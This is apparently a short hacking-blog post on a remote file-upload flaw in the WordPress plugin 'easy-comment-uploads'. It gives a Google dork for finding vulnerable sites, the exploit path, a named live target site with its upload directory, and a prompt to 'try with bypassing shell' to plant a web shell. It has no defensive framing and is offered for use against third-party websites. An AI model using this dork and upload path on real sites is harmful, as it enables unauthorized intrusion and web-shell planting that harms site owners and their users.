Google Dork : inurl:wp-content/plugins/easy-comment-uploads/upload-form.php
Exploit: wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/[PATH]/wp-content/plugins/easy-comment-uploads/upload-form.php
Live Target: http://flyguys.net/blog/wp-content/plugins/easy-comment-uploads/upload-form.php
Live Target Upload Dir: http://flyguys.net/blog/wp-content/uploads/2014/09/x.jpg
You can upload: html,txt,gif,jpg,bmp,movie formats. Try with bypassing shell
After upload you can access to your file:
Example: http://www.[target].com/wp-content/uploads/[YEAR]/[MONTH]/yourfile.txt
Example: http://www.[target].com/wp-content/uploads/2014/09/x.txt
Don't forgot to share on Twitter,Facebook & Google+ Accounts
If you have some problem you can type in comment i will answer
0 Response to "WordPress - Plugin easy-comment-uploads Remote File Upload"
Posting Komentar